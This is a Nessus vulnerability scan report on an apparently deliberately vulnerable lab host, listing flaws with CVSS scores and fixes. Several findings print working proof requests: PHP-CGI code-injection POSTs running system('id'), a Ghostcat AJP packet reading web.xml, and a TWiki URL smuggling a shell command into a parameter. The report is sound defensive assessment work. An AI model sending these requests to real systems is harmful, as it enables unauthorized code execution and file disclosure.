Nessus Essentials

Nessus Report

Report generated by Tenable Nessus™

Metasploitable Ultra

Thu, 19 Jun 2025 09:53:56 UTC

TABLE OF CONTENTS
Vulnerabilities by HostExpand All | Collapse All
172.19.0.2
12
8
33
14
144
Critical
High
Medium
Low
Info
Scan Information
Start time: Thu Jun 19 09:34:21 2025
End time: Thu Jun 19 09:53:56 2025
Host Information
DNS Name: metasploitable2.sicurform
Netbios Name: 04CBEBC48A57
IP: 172.19.0.2
MAC Address: 02:42:AC:13:00:02
OS: Linux Kernel 2.6 on Ubuntu 8.04 (hardy)
Vulnerabilities

70728 - Apache PHP-CGI Remote Code Execution
-
Synopsis
The remote web server contains a version of PHP that allows arbitrary code execution.
Description
The PHP installation on the remote web server contains a flaw that could allow a remote attacker to pass command-line arguments as part of a query string to the PHP-CGI program. This could be abused to execute arbitrary code, reveal PHP source code, cause a system crash, etc.
Solution
Upgrade to PHP 5.3.13 / 5.4.3 or later.
Risk Factor
High
CVSS v3.0 Base Score
9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS v3.0 Temporal Score
9.4 (CVSS:3.0/E:H/RL:O/RC:C)
VPR Score
8.9
EPSS Score
0.9439
CVSS v2.0 Base Score
7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS v2.0 Temporal Score
6.5 (CVSS2#E:H/RL:OF/RC:C)
References
BID 53388
CVE CVE-2012-1823
CVE CVE-2012-2311
CVE CVE-2012-2335
CVE CVE-2012-2336
XREF CERT:520827
XREF EDB-ID:29290
XREF EDB-ID:29316
XREF CISA-KNOWN-EXPLOITED:2022/04/15
Exploitable With
CANVAS (true) Core Impact (true) Metasploit (true)
Plugin Information
Published: 2013/11/01, Modified: 2023/04/25
Plugin Output

tcp/80/www


Nessus was able to verify the issue exists using the following request :

------------------------------ snip ------------------------------
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: metasploitable2.sicurform
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Content-Length: 115
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

<?php echo "Content-Type:text/html\r\n\r\n"; echo 'php_cgi_remote_code_execution-1750326112'; system('id'); die; ?>
------------------------------ snip ------------------------------

134862 - Apache Tomcat AJP Connector Request Injection (Ghostcat)
-
Synopsis
There is a vulnerable AJP connector listening on the remote host.
Description
A file read/inclusion vulnerability was found in AJP connector. A remote, unauthenticated attacker could exploit this vulnerability to read web application files from a vulnerable server. In instances where the vulnerable server allows file uploads, an attacker could upload malicious JavaServer Pages (JSP) code within a variety of file types and gain remote code execution (RCE).
See Also
Solution
Update the AJP configuration to require authorization and/or upgrade the Tomcat server to 7.0.100, 8.5.51, 9.0.31 or later.
Risk Factor
High
CVSS v3.0 Base Score
9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS v3.0 Temporal Score
9.4 (CVSS:3.0/E:H/RL:O/RC:C)
VPR Score
8.9
EPSS Score
0.9447
CVSS v2.0 Base Score
7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS v2.0 Temporal Score
6.5 (CVSS2#E:H/RL:OF/RC:C)
References
CVE CVE-2020-1745
CVE CVE-2020-1938
XREF CISA-KNOWN-EXPLOITED:2022/03/17
XREF CEA-ID:CEA-2020-0021
Plugin Information
Published: 2020/03/24, Modified: 2025/02/12
Plugin Output

tcp/8009/ajp13


Nessus was able to exploit the issue using the following request :

0x0000: 02 02 00 08 48 54 54 50 2F 31 2E 31 00 00 0F 2F ....HTTP/1.1.../
0x0010: 61 73 64 66 2F 78 78 78 78 78 2E 6A 73 70 00 00 asdf/xxxxx.jsp..
0x0020: 09 6C 6F 63 61 6C 68 6F 73 74 00 FF FF 00 09 6C .localhost.....l
0x0030: 6F 63 61 6C 68 6F 73 74 00 00 50 00 00 09 A0 06 ocalhost..P.....
0x0040: 00 0A 6B 65 65 70 2D 61 6C 69 76 65 00 00 0F 41 ..keep-alive...A
0x0050: 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 00 00 ccept-Language..
0x0060: 0E 65 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 35 00 .en-US,en;q=0.5.
0x0070: A0 08 00 01 30 00 00 0F 41 63 63 65 70 74 2D 45 ....0...Accept-E
0x0080: 6E 63 6F 64 69 6E 67 00 00 13 67 7A 69 70 2C 20 ncoding...gzip,
0x0090: 64 65 66 6C 61 74 65 2C 20 73 64 63 68 00 00 0D deflate, sdch...
0x00A0: 43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 00 00 09 Cache-Control...
0x00B0: 6D 61 78 2D 61 67 65 3D 30 00 A0 0E 00 07 4D 6F max-age=0.....Mo
0x00C0: 7A 69 6C 6C 61 00 00 19 55 70 67 72 61 64 65 2D zilla...Upgrade-
0x00D0: 49 6E 73 65 63 75 72 65 2D 52 65 71 75 65 73 74 Insecure-Request
0x00E0: 73 00 00 01 31 00 A0 01 00 09 74 65 78 74 2F 68 s...1.....text/h
0x00F0: 74 6D 6C 00 A0 0B 00 09 6C 6F 63 61 6C 68 6F 73 tml.....localhos
0x0100: 74 00 0A 00 21 6A 61 76 61 78 2E 73 65 72 76 6C t...!javax.servl
0x0110: 65 74 2E 69 6E 63 6C 75 64 65 2E 72 65 71 75 65 et.include.reque
0x0120: 73 74 5F 75 72 69 00 00 01 31 00 0A 00 1F 6A 61 st_uri...1....ja
0x0130: 76 61 78 2E 73 65 72 76 6C 65 74 2E 69 6E 63 6C vax.servlet.incl
0x0140: 75 64 65 2E 70 61 74 68 5F 69 6E 66 6F 00 00 10 ude.path_info...
0x0150: 2F 57 45 42 2D 49 4E 46 2F 77 65 62 2E 78 6D 6C /WEB-INF/web.xml
0x0160: 00 0A 00 22 6A 61 76 61 78 2E 73 65 72 76 6C 65 ..."javax.servle
0x0170: 74 2E 69 6E 63 6C 75 64 65 2E 73 65 72 76 6C 65 t.include.servle
0x0180: 74 5F 70 61 74 68 00 00 00 00 FF t_path.....



This produced the following truncated output (limited to 10 lines) :
------------------------------ snip ------------------------------
...<?xml version="1.0" encoding="ISO-8859-1"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0
[...]

------------------------------ snip ------------------------------

171340 - Apache Tomcat SEoL (<= 5.5.x)
-
Synopsis
An unsupported version of Apache Tomcat is installed on the remote host.
Description
According to its version, Apache Tomcat is less than or equal to 5.5.x. It is, therefore, no longer maintained by its vendor or provider.

Lack of support implies that no new security patches for the product will be released by the vendor. As a result, it may contain security vulnerabilities.
See Also
Solution
Upgrade to a version of Apache Tomcat that is currently supported.
Risk Factor
Critical
CVSS v3.0 Base Score
10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
CVSS v2.0 Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
Plugin Information
Published: 2023/02/10, Modified: 2024/05/06
Plugin Output

tcp/8180/www


URL : http://metasploitable2.sicurform:8180/
Installed version : 5.5
Security End of Life : September 30, 2012
Time since Security End of Life (Est.) : >= 12 years

201352 - Canonical Ubuntu Linux SEoL (8.04.x)
-
Synopsis
An unsupported version of Canonical Ubuntu Linux is installed on the remote host.
Description
According to its version, Canonical Ubuntu Linux is 8.04.x. It is, therefore, no longer maintained by its vendor or provider.

Lack of support implies that no new security patches for the product will be released by the vendor. As a result, it may contain security vulnerabilities.
See Also
Solution
Upgrade to a version of Canonical Ubuntu Linux that is currently supported.
Risk Factor
Critical
CVSS v3.0 Base Score
10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
CVSS v2.0 Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
Plugin Information
Published: 2024/07/03, Modified: 2025/03/26
Plugin Output

tcp/80/www


OS : Ubuntu Linux 8.04
Security End of Life : May 9, 2013
Time since Security End of Life (Est.) : >= 12 years

32314 - Debian OpenSSH/OpenSSL Package Random Number Generator Weakness
-
Synopsis
The remote SSH host keys are weak.
Description
The remote SSH host key has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.

The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.

An attacker can easily obtain the private part of the remote key and use this to set up decipher the remote session or set up a man in the middle attack.
See Also
Solution
Consider all cryptographic material generated on the remote host to be guessable. In particuliar, all SSH, SSL and OpenVPN key material should be re-generated.
Risk Factor
Critical
VPR Score
5.1
EPSS Score
0.0165
CVSS v2.0 Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS v2.0 Temporal Score
8.3 (CVSS2#E:F/RL:OF/RC:C)
References
BID 29179
CVE CVE-2008-0166
XREF CWE:310
Exploitable With
Core Impact (true)
Plugin Information
Published: 2008/05/14, Modified: 2024/07/24
Plugin Output

tcp/22/ssh

32321 - Debian OpenSSH/OpenSSL Package Random Number Generator Weakness (SSL check)
-
Synopsis
The remote SSL certificate uses a weak key.
Description
The remote x509 certificate on the remote SSL server has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.

The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.

An attacker can easily obtain the private part of the remote key and use this to decipher the remote session or set up a man in the middle attack.
See Also
Solution
Consider all cryptographic material generated on the remote host to be guessable. In particuliar, all SSH, SSL and OpenVPN key material should be re-generated.
Risk Factor
Critical
VPR Score
5.1
EPSS Score
0.0165
CVSS v2.0 Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS v2.0 Temporal Score
8.3 (CVSS2#E:F/RL:OF/RC:C)
References
BID 29179
CVE CVE-2008-0166
XREF CWE:310
Exploitable With
Core Impact (true)
Plugin Information
Published: 2008/05/15, Modified: 2020/11/16
Plugin Output

tcp/25/smtp

32321 - Debian OpenSSH/OpenSSL Package Random Number Generator Weakness (SSL check)
-
Synopsis
The remote SSL certificate uses a weak key.
Description
The remote x509 certificate on the remote SSL server has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.

The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.

An attacker can easily obtain the private part of the remote key and use this to decipher the remote session or set up a man in the middle attack.
See Also
Solution
Consider all cryptographic material generated on the remote host to be guessable. In particuliar, all SSH, SSL and OpenVPN key material should be re-generated.
Risk Factor
Critical
VPR Score
5.1
EPSS Score
0.0165
CVSS v2.0 Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS v2.0 Temporal Score
8.3 (CVSS2#E:F/RL:OF/RC:C)
References
BID 29179
CVE CVE-2008-0166
XREF CWE:310
Exploitable With
Core Impact (true)
Plugin Information
Published: 2008/05/15, Modified: 2020/11/16
Plugin Output

tcp/5432/postgresql

20007 - SSL Version 2 and 3 Protocol Detection
-
Synopsis
The remote service encrypts traffic using a protocol with known weaknesses.
Description
The remote service accepts connections encrypted using SSL 2.0 and/or SSL 3.0. These versions of SSL are affected by several cryptographic flaws, including:

- An insecure padding scheme with CBC ciphers.

- Insecure session renegotiation and resumption schemes.

An attacker can exploit these flaws to conduct man-in-the-middle attacks or to decrypt communications between the affected service and clients.

Although SSL/TLS has a secure means for choosing the highest supported version of the protocol (so that these versions will be used only if the client or server support nothing better), many web browsers implement this in an unsafe way that allows an attacker to downgrade a connection (such as in POODLE). Therefore, it is recommended that these protocols be disabled entirely.

NIST has determined that SSL 3.0 is no longer acceptable for secure communications. As of the date of enforcement found in PCI DSS v3.1, any version of SSL will not meet the PCI SSC's definition of 'strong cryptography'.
See Also
Solution
Consult the application's documentation to disable SSL 2.0 and 3.0.
Use TLS 1.2 (with approved cipher suites) or higher instead.
Risk Factor
Critical
CVSS v3.0 Base Score
9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS v2.0 Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
Plugin Information
Published: 2005/10/12, Modified: 2022/04/04
Plugin Output

tcp/25/smtp


- SSLv2 is enabled and the server supports at least one cipher.

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC2-CBC-MD5 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 RSA(512) RSA RC4(40) MD5 export

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DES-CBC3-MD5 RSA RSA 3DES-CBC(168) MD5

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
RC4-MD5 RSA RSA RC4(128) MD5

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

- SSLv3 is enabled and the server supports at least one cipher.
Explanation: TLS 1.0 and SSL 3.0 cipher suites may be used with SSLv3


Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-EDH-RSA-DES-CBC-SHA DH(512) RSA DES-CBC(40) SHA1 export
EDH-RSA-DES-CBC-SHA DH RSA DES-CBC(56) SHA1
EXP-ADH-DES-CBC-SHA DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 DH(512) None RC4(40) MD5 export
ADH-DES-CBC-SHA DH None DES-CBC(56) SHA1
EXP-DES-CBC-SHA RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 RSA(512) RSA RC4(40) MD5 export
DES-CBC-SHA RSA RSA DES-CBC(56) SHA1

Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA DH RSA 3DES-CBC(168) SHA1
ADH-DES-CBC3-SHA DH None 3DES-CBC(168) SHA1
DES-CBC3-SHA RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA DH RSA AES-CBC(256) SHA1
ADH-AES128-SHA DH None AES-CBC(128) SHA1
ADH-AES256-SHA DH None AES-CBC(256) SHA1
ADH-RC4-MD5 DH None RC4(128) MD5
AES128-SHA RSA RSA AES-CBC(128) SHA1
AES256-SHA RSA RSA AES-CBC(256) SHA1
RC4-MD5 RSA RSA RC4(128) MD5
RC4-SHA RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

20007 - SSL Version 2 and 3 Protocol Detection
-
Synopsis
The remote service encrypts traffic using a protocol with known weaknesses.
Description
The remote service accepts connections encrypted using SSL 2.0 and/or SSL 3.0. These versions of SSL are affected by several cryptographic flaws, including:

- An insecure padding scheme with CBC ciphers.

- Insecure session renegotiation and resumption schemes.

An attacker can exploit these flaws to conduct man-in-the-middle attacks or to decrypt communications between the affected service and clients.

Although SSL/TLS has a secure means for choosing the highest supported version of the protocol (so that these versions will be used only if the client or server support nothing better), many web browsers implement this in an unsafe way that allows an attacker to downgrade a connection (such as in POODLE). Therefore, it is recommended that these protocols be disabled entirely.

NIST has determined that SSL 3.0 is no longer acceptable for secure communications. As of the date of enforcement found in PCI DSS v3.1, any version of SSL will not meet the PCI SSC's definition of 'strong cryptography'.
See Also
Solution
Consult the application's documentation to disable SSL 2.0 and 3.0.
Use TLS 1.2 (with approved cipher suites) or higher instead.
Risk Factor
Critical
CVSS v3.0 Base Score
9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS v2.0 Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
Plugin Information
Published: 2005/10/12, Modified: 2022/04/04
Plugin Output

tcp/5432/postgresql


- SSLv3 is enabled and the server supports at least one cipher.
Explanation: TLS 1.0 and SSL 3.0 cipher suites may be used with SSLv3


Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA DH RSA 3DES-CBC(168) SHA1
DES-CBC3-SHA RSA RSA 3DES-CBC(168) SHA1

High Strength Ciphers (>= 112-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DHE-RSA-AES128-SHA DH RSA AES-CBC(128) SHA1
DHE-RSA-AES256-SHA DH RSA AES-CBC(256) SHA1
AES128-SHA RSA RSA AES-CBC(128) SHA1
AES256-SHA RSA RSA AES-CBC(256) SHA1
RC4-SHA RSA RSA RC4(128) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

46882 - UnrealIRCd Backdoor Detection
-
Synopsis
The remote IRC server contains a backdoor.
Description
The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host.
See Also
Solution
Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.
Risk Factor
Critical
VPR Score
7.4
EPSS Score
0.7216
CVSS v2.0 Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS v2.0 Temporal Score
8.3 (CVSS2#E:F/RL:OF/RC:C)
References
Exploitable With
CANVAS (true) Metasploit (true)
Plugin Information
Published: 2010/06/14, Modified: 2022/04/11
Plugin Output

tcp/6667/irc


The remote IRC server is running as :

uid=0(root) gid=0(root) groups=0(root)

61708 - VNC Server 'password' Password
-
Synopsis
A VNC server running on the remote host is secured with a weak password.
Description
The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of 'password'. A remote, unauthenticated attacker could exploit this to take control of the system.
Solution
Secure the VNC service with a strong password.
Risk Factor
Critical
CVSS v2.0 Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
Plugin Information
Published: 2012/08/29, Modified: 2015/09/24
Plugin Output

tcp/5900/vnc


Nessus logged in using a password of "password".

125855 - phpMyAdmin prior to 4.8.6 SQLi vulnerablity (PMASA-2019-3)
-
Synopsis
The remote web server hosts a PHP application that is affected by SQLi vulnerability.
Description
According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is prior to 4.8.6. It is, therefore, affected by a SQL injection (SQLi) vulnerability that exists in designer feature of phpMyAdmin. An unauthenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data.

Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.
See Also
Solution
Upgrade to phpMyAdmin version 4.8.6 or later.
Alternatively, apply the patches referenced in the vendor advisories.
Risk Factor
High
CVSS v3.0 Base Score
9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS v3.0 Temporal Score
8.5 (CVSS:3.0/E:U/RL:O/RC:C)
VPR Score
5.9
EPSS Score
0.0172
CVSS v2.0 Base Score
7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS v2.0 Temporal Score
5.5 (CVSS2#E:U/RL:OF/RC:C)
References
Plugin Information
Published: 2019/06/13, Modified: 2024/11/22
Plugin Output

tcp/80/www


URL : http://metasploitable2.sicurform/phpMyAdmin
Installed version : 3.1.1
Fixed version : 4.8.6
59088 - PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution
-
Synopsis
The remote web server contains a version of PHP that allows arbitrary code execution.
Description
The PHP installation on the remote web server contains a flaw that could allow a remote attacker to pass command-line arguments as part of a query string to the PHP-CGI program. This could be abused to execute arbitrary code, reveal PHP source code, cause a system crash, etc.
See Also
Solution
If using Lotus Foundations, upgrade the Lotus Foundations operating system to version 1.2.2b or later.

Otherwise, upgrade to PHP 5.3.13 / 5.4.3 or later.
Risk Factor
High
VPR Score
8.9
EPSS Score
0.9439
CVSS v2.0 Base Score
7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS v2.0 Temporal Score
6.5 (CVSS2#E:H/RL:OF/RC:C)
References
BID 53388
CVE CVE-2012-1823
CVE CVE-2012-2311
XREF CERT:520827
XREF EDB-ID:18834
XREF CISA-KNOWN-EXPLOITED:2022/04/15
Exploitable With
CANVAS (true) Core Impact (true) Metasploit (true)
Plugin Information
Published: 2012/05/14, Modified: 2022/03/28
Plugin Output

tcp/80/www


Nessus was able to verify the issue exists using the following request :

------------------------------ snip ------------------------------
POST /dvwa/dvwa/includes/DBMS/DBMS.php?-d+allow_url_include%3don+-d+safe_mode%3doff+-d+suhosin.simulation%3don+-d+open_basedir%3doff+-d+auto_prepend_file%3dphp%3a//input+-n HTTP/1.1
Host: metasploitable2.sicurform
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Content-Length: 82
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

<?php echo 'php_cgi_query_string_code_execution-1750326112'; system('id'); die; ?>
------------------------------ snip ------------------------------

42873 - SSL Medium Strength Cipher Suites Supported (SWEET32)
-
Synopsis
The remote service supports the use of medium strength SSL ciphers.
Description
The remote host supports the use of SSL ciphers that offer medium strength encryption. Nessus regards medium strength as any encryption that uses key lengths at least 64 bits and less than 112 bits, or else that uses the 3DES encryption suite.

Note that it is considerably easier to circumvent medium strength encryption if the attacker is on the same physical network.
See Also
Solution
Reconfigure the affected application if possible to avoid use of medium strength ciphers.
Risk Factor
Medium
CVSS v3.0 Base Score
7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
VPR Score
6.1
EPSS Score
0.406
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
References
Plugin Information
Published: 2009/11/23, Modified: 2025/02/12
Plugin Output

tcp/25/smtp


Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
DES-CBC3-MD5 0x07, 0x00, 0xC0 RSA RSA 3DES-CBC(168) MD5
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
ADH-DES-CBC3-SHA 0x00, 0x1B DH None 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

42873 - SSL Medium Strength Cipher Suites Supported (SWEET32)
-
Synopsis
The remote service supports the use of medium strength SSL ciphers.
Description
The remote host supports the use of SSL ciphers that offer medium strength encryption. Nessus regards medium strength as any encryption that uses key lengths at least 64 bits and less than 112 bits, or else that uses the 3DES encryption suite.

Note that it is considerably easier to circumvent medium strength encryption if the attacker is on the same physical network.
See Also
Solution
Reconfigure the affected application if possible to avoid use of medium strength ciphers.
Risk Factor
Medium
CVSS v3.0 Base Score
7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
VPR Score
6.1
EPSS Score
0.406
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
References
Plugin Information
Published: 2009/11/23, Modified: 2025/02/12
Plugin Output

tcp/5432/postgresql


Medium Strength Ciphers (> 64-bit and < 112-bit key, or 3DES)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EDH-RSA-DES-CBC3-SHA 0x00, 0x16 DH RSA 3DES-CBC(168) SHA1
DES-CBC3-SHA 0x00, 0x0A RSA RSA 3DES-CBC(168) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}

90509 - Samba Badlock Vulnerability
-
Synopsis
An SMB server running on the remote host is affected by the Badlock vulnerability.
Description
The version of Samba, a CIFS/SMB server for Linux and Unix, running on the remote host is affected by a flaw, known as Badlock, that exists in the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) protocols due to improper authentication level negotiation over Remote Procedure Call (RPC) channels. A man-in-the-middle attacker who is able to able to intercept the traffic between a client and a server hosting a SAM database can exploit this flaw to force a downgrade of the authentication level, which allows the execution of arbitrary Samba network calls in the context of the intercepted user, such as viewing or modifying sensitive security data in the Active Directory (AD) database or disabling critical services.
See Also
Solution
Upgrade to Samba version 4.2.11 / 4.3.8 / 4.4.2 or later.
Risk Factor
Medium
CVSS v3.0 Base Score
7.5 (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
CVSS v3.0 Temporal Score
6.5 (CVSS:3.0/E:U/RL:O/RC:C)
VPR Score
5.9
EPSS Score
0.7992
CVSS v2.0 Base Score
6.8 (CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVSS v2.0 Temporal Score
5.0 (CVSS2#E:U/RL:OF/RC:C)
References
BID 86002
CVE CVE-2016-2118
XREF CERT:813296
Plugin Information
Published: 2016/04/13, Modified: 2019/11/20
Plugin Output

tcp/445/cifs


Nessus detected that the Samba Badlock patch has not been applied.

19704 - TWiki 'rev' Parameter Arbitrary Command Execution
-
Synopsis
The remote web server hosts a CGI application that is affected by an arbitrary command execution vulnerability.
Description
The version of TWiki running on the remote host allows an attacker to manipulate input to the 'rev' parameter in order to execute arbitrary shell commands on the remote host subject to the privileges of the web server user id.
See Also
Solution
Apply the appropriate hotfix referenced in the vendor advisory.
Risk Factor
High
CVSS v3.0 Base Score
8.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
CVSS v3.0 Temporal Score
8.2 (CVSS:3.0/E:F/RL:O/RC:C)
VPR Score
7.4
EPSS Score
0.8167
CVSS v2.0 Base Score
7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS v2.0 Temporal Score
6.2 (CVSS2#E:F/RL:OF/RC:C)
References
Exploitable With
Metasploit (true)
Plugin Information
Published: 2005/09/15, Modified: 2025/05/14
Plugin Output

tcp/80/www


Nessus was able to execute the command "id" using the
following request :

http://metasploitable2.sicurform/twiki/bin/view/Main/TWikiUsers?rev=2%20%7cid%7c%7cecho%20


This produced the following truncated output (limited to 2 lines) :
------------------------------ snip ------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)

------------------------------ snip ------------------------------
36171 - phpMyAdmin Setup Script Configuration Parameters Arbitrary PHP Code Injection (PMASA-2009-4)
-
Synopsis
The remote web server contains a PHP application that is affected by a code execution vulnerability.
Description
The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. This version is affected by the following vulnerabilities :

- The setup script inserts the unsanitized verbose server name into a C-style comment during config file generation.

- An attacker can save arbitrary data to the generated config file by altering the value of the 'textconfig' parameter during a POST request to config.php.

An unauthenticated, remote attacker can exploit these issues to execute arbitrary PHP code.
See Also
Solution
Upgrade to phpMyAdmin 3.1.3.2. Alternatively, apply the patches referenced in the project's advisory.
Risk Factor
High
VPR Score
6.7
EPSS Score
0.0116
CVSS v2.0 Base Score
7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS v2.0 Temporal Score
5.5 (CVSS2#E:U/RL:OF/RC:C)
References
BID 34526
CVE CVE-2009-1285
XREF TRA:TRA-2009-02
XREF SECUNIA:34727
XREF CWE:94
Plugin Information
Published: 2009/04/16, Modified: 2022/04/11
Plugin Output

tcp/80/www

10205 - rlogin Service Detection
-
Synopsis
The rlogin service is running on the remote host.
Description
